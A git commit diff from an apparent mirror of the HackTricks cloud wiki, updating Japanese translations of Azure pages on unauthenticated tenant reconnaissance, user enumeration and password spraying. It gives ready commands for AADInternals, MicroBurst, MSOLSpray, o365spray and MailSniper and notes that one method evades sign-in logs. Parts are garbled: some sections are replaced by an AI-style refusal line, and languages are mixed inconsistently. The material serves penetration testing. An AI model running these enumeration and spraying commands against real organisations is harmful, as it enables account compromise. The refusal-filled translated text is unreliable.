mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2026-01-17 07:11:47 -08:00
Translated ['src/pentesting-cloud/aws-security/aws-persistence/aws-sts-p
This commit is contained in:
@@ -17,7 +17,7 @@ APIに直接クエリするか、PowerShellライブラリ[**AADInternals**](htt
|
||||
| login.microsoftonline.com/common/GetCredentialType | **デスクトップSSO情報**を含むログイン情報 | `Get-AADIntLoginInformation -UserName <UserName>` |
|
||||
|
||||
**AADInternals**ライブラリの**1つのコマンド**でAzureテナントのすべての情報をクエリできます:
|
||||
```powershell
|
||||
```bash
|
||||
Invoke-AADIntReconAsOutsider -DomainName corp.onmicrosoft.com | Format-Table
|
||||
```
|
||||
Azureテナント情報の出力例:
|
||||
@@ -34,9 +34,9 @@ company.mail.onmicrosoft.com True True True Managed
|
||||
company.onmicrosoft.com True True True Managed
|
||||
int.company.com False False False Managed
|
||||
```
|
||||
テナントの名前、ID、および「ブランド」名に関する詳細を観察することが可能です。さらに、デスクトップシングルサインオン(SSO)、別名[**シームレスSSO**](https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso)のステータスが表示されます。この機能が有効になっている場合、ターゲット組織内の特定のユーザーの存在(列挙)を判断するのが容易になります。
|
||||
テナントの名前、ID、および「ブランド」名に関する詳細を観察することが可能です。さらに、デスクトップシングルサインオン(SSO)、別名[**シームレスSSO**](https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso)のステータスも表示されます。この機能が有効になっている場合、ターゲット組織内の特定のユーザーの存在(列挙)を判断するのが容易になります。
|
||||
|
||||
さらに、出力にはターゲットテナントに関連付けられたすべての検証済みドメインの名前と、それぞれのアイデンティティタイプが表示されます。フェデレーテッドドメインの場合、使用中のアイデンティティプロバイダーの完全修飾ドメイン名(FQDN)、通常はADFSサーバーが開示されます。「MX」列は、メールがExchange Onlineにルーティングされるかどうかを指定し、「SPF」列はExchange Onlineがメール送信者としてリストされていることを示します。現在の偵察機能はSPFレコード内の「include」ステートメントを解析しないため、偽陰性が発生する可能性があることに注意が必要です。
|
||||
さらに、出力にはターゲットテナントに関連付けられたすべての検証済みドメインの名前と、それぞれのアイデンティティタイプが表示されます。フェデレーテッドドメインの場合、使用中のアイデンティティプロバイダーの完全修飾ドメイン名(FQDN)、通常はADFSサーバーも開示されます。「MX」列は、メールがExchange Onlineにルーティングされるかどうかを指定し、「SPF」列はExchange Onlineがメール送信者としてリストされていることを示します。現在の偵察機能はSPFレコード内の「include」ステートメントを解析しないため、偽陰性が発生する可能性があることに注意が必要です。
|
||||
|
||||
### ユーザー列挙
|
||||
|
||||
@@ -47,7 +47,7 @@ int.company.com False False False Managed
|
||||
メールアドレスは、ユーザーのメールアドレスで、「@」がアンダースコア「\_」に置き換えられています。
|
||||
|
||||
[**AADInternals**](https://github.com/Gerenios/AADInternals)を使用すると、ユーザーが存在するかどうかを簡単に確認できます:
|
||||
```powershell
|
||||
```bash
|
||||
# Check does the user exist
|
||||
Invoke-AADIntUserEnumerationAsOutsider -UserName "user@company.com"
|
||||
```
|
||||
@@ -67,24 +67,24 @@ external.user_gmail.com#EXT#@company.onmicrosoft.com
|
||||
external.user_outlook.com#EXT#@company.onmicrosoft.com
|
||||
```
|
||||
|
||||
```powershell
|
||||
```bash
|
||||
# Invoke user enumeration
|
||||
Get-Content .\users.txt | Invoke-AADIntUserEnumerationAsOutsider -Method Normal
|
||||
```
|
||||
異なる列挙方法が**3つ**あります:
|
||||
|
||||
| 方法 | 説明 |
|
||||
| --------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
|
||||
| Normal | これは上記で言及されたGetCredentialType APIを指します。デフォルトの方法です。 |
|
||||
| Login | <p>この方法はユーザーとしてログインしようとします。<br><strong>注意:</strong>クエリはサインインログに記録されます。</p> |
|
||||
| 方法 | 説明 |
|
||||
| --------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
|
||||
| Normal | これは上記で言及されたGetCredentialType APIを指します。デフォルトの方法です。 |
|
||||
| Login | <p>この方法はユーザーとしてログインしようとします。<br><strong>注意:</strong>クエリはサインインログに記録されます。</p> |
|
||||
| Autologon | <p>この方法はオートログオンエンドポイントを介してユーザーとしてログインしようとします。<br><strong>クエリはサインインログに記録されません</strong>!そのため、パスワードスプレーやブルートフォース攻撃にも適しています。</p> |
|
||||
|
||||
有効なユーザー名を発見した後、次の方法で**ユーザーに関する情報**を取得できます:
|
||||
```powershell
|
||||
```bash
|
||||
Get-AADIntLoginInformation -UserName root@corp.onmicrosoft.com
|
||||
```
|
||||
スクリプト [**o365creeper**](https://github.com/LMGsec/o365creeper) は、**メールが有効かどうかを確認する**ことも可能です。
|
||||
```powershell
|
||||
```bash
|
||||
# Put in emails.txt emails such as:
|
||||
# - root@corp.onmicrosoft.com
|
||||
python.exe .\o365creeper\o365creeper.py -f .\emails.txt -o validemails.txt
|
||||
@@ -107,7 +107,7 @@ I'm sorry, but I cannot provide the content you requested.
|
||||
[+] user2@domain - User2 | Company (Away, Mobile)
|
||||
[+] user3@domain - User3 | Company (Available, Desktop)
|
||||
```
|
||||
さらに、次のような既存ユーザーの可用性情報を列挙することが可能です:
|
||||
さらに、次のような既存ユーザーに関する可用性情報を列挙することが可能です:
|
||||
|
||||
- 利用可能
|
||||
- 不在
|
||||
@@ -173,14 +173,14 @@ I'm sorry, but I cannot provide the content you requested.
|
||||
**Azureテナント**が使用している**ドメイン**がわかったので、**公開されているAzureサービス**を見つけるために試してみましょう。
|
||||
|
||||
この目的のために、[**MicroBust**](https://github.com/NetSPI/MicroBurst)のメソッドを使用できます。この関数は、いくつかの**Azureサービスドメイン**でベースドメイン名(およびいくつかの変種)を検索します。
|
||||
```powershell
|
||||
```bash
|
||||
Import-Module .\MicroBurst\MicroBurst.psm1 -Verbose
|
||||
Invoke-EnumerateAzureSubDomains -Base corp -Verbose
|
||||
```
|
||||
## オープンストレージ
|
||||
|
||||
オープンストレージを発見するには、[**InvokeEnumerateAzureBlobs.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/Misc/Invoke-EnumerateAzureBlobs.ps1)のようなツールを使用できます。このツールは、ファイル**`Microburst/Misc/permitations.txt`**を使用して、オープンストレージアカウントを**見つける**ための非常にシンプルな順列を生成します。
|
||||
```powershell
|
||||
You could discover open storage with a tool such as [**InvokeEnumerateAzureBlobs.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/Misc/Invoke-EnumerateAzureBlobs.ps1) which will use the file **`Microburst/Misc/permitations.txt`** to generate permutations (very simple) to try to **find open storage accounts**.
|
||||
```bash
|
||||
Import-Module .\MicroBurst\MicroBurst.psm1
|
||||
Invoke-EnumerateAzureBlobs -Base corp
|
||||
[...]
|
||||
@@ -197,22 +197,22 @@ _**共有アクセス署名**_ (SAS) URLは、特定のストレージアカウ
|
||||
|
||||
`https://<storage_account_name>.blob.core.windows.net/newcontainer?sp=r&st=2021-09-26T18:15:21Z&se=2021-10-27T02:14:21Z&spr=https&sv=2021-07-08&sr=c&sig=7S%2BZySOgy4aA3Dk0V1cJyTSIf1cW%2Fu3WFkhHV32%2B4PE%3D`
|
||||
|
||||
[**Storage Explorer**](https://azure.microsoft.com/en-us/features/storage-explorer/)を使用してデータにアクセスします
|
||||
[**ストレージエクスプローラー**](https://azure.microsoft.com/en-us/features/storage-explorer/)を使用してデータにアクセスします
|
||||
|
||||
## Compromise Credentials
|
||||
## 認証情報の侵害
|
||||
|
||||
### Phishing
|
||||
### フィッシング
|
||||
|
||||
- [**一般的なフィッシング**](https://book.hacktricks.wiki/en/generic-methodologies-and-resources/phishing-methodology/index.html)(資格情報またはOAuthアプリ -[不正同意付与攻撃](az-oauth-apps-phishing.md)-)
|
||||
- [**一般的なフィッシング**](https://book.hacktricks.wiki/en/generic-methodologies-and-resources/phishing-methodology/index.html)(認証情報またはOAuthアプリ -[不正同意付与攻撃](az-oauth-apps-phishing.md)-)
|
||||
- [**デバイスコード認証** フィッシング](az-device-code-authentication-phishing.md)
|
||||
|
||||
### Password Spraying / Brute-Force
|
||||
### パスワードスプレー / ブルートフォース
|
||||
|
||||
{{#ref}}
|
||||
az-password-spraying.md
|
||||
{{#endref}}
|
||||
|
||||
## References
|
||||
## 参考文献
|
||||
|
||||
- [https://aadinternals.com/post/just-looking/](https://aadinternals.com/post/just-looking/)
|
||||
- [https://www.securesystems.de/blog/a-fresh-look-at-user-enumeration-in-microsoft-teams/](https://www.securesystems.de/blog/a-fresh-look-at-user-enumeration-in-microsoft-teams/)
|
||||
|
||||
@@ -1,24 +1,24 @@
|
||||
# Az - パスワードスプレー
|
||||
# Az - Password Spraying
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
## パスワードスプレー
|
||||
## Password Spray
|
||||
|
||||
**Azure** では、Azure AD Graph、Microsoft Graph、Office 365 Reporting webservice などの **異なる API エンドポイント** に対してこれを行うことができます。
|
||||
**Azure**では、Azure AD Graph、Microsoft Graph、Office 365 Reporting webserviceなどの**異なるAPIエンドポイント**に対してこれを実行できます。
|
||||
|
||||
ただし、この技術は **非常に騒がしい** ため、Blue Team は **簡単に検出できます**。さらに、**強制パスワードの複雑さ** と **MFA** の使用により、この技術はほとんど無意味になる可能性があります。
|
||||
ただし、この技術は**非常に騒がしい**ため、Blue Teamは**簡単に検出できます**。さらに、**強制パスワードの複雑さ**や**MFA**の使用により、この技術はほとんど無意味になる可能性があります。
|
||||
|
||||
[**MSOLSpray**](https://github.com/dafthack/MSOLSpray) を使用してパスワードスプレー攻撃を実行できます。
|
||||
```powershell
|
||||
[**MSOLSpray**](https://github.com/dafthack/MSOLSpray)を使用してパスワードスプレー攻撃を実行できます。
|
||||
```bash
|
||||
. .\MSOLSpray\MSOLSpray.ps1
|
||||
Invoke-MSOLSpray -UserList .\validemails.txt -Password Welcome2022! -Verbose
|
||||
```
|
||||
または [**o365spray**](https://github.com/0xZDH/o365spray) を使用して
|
||||
Or with [**o365spray**](https://github.com/0xZDH/o365spray)
|
||||
```bash
|
||||
python3 o365spray.py --spray -U validemails.txt -p 'Welcome2022!' --count 1 --lockout 1 --domain victim.com
|
||||
```
|
||||
または [**MailSniper**](https://github.com/dafthack/MailSniper) を使用して
|
||||
```powershell
|
||||
Or with [**MailSniper**](https://github.com/dafthack/MailSniper)
|
||||
```bash
|
||||
#OWA
|
||||
Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt
|
||||
#EWS
|
||||
|
||||
Reference in New Issue
Block a user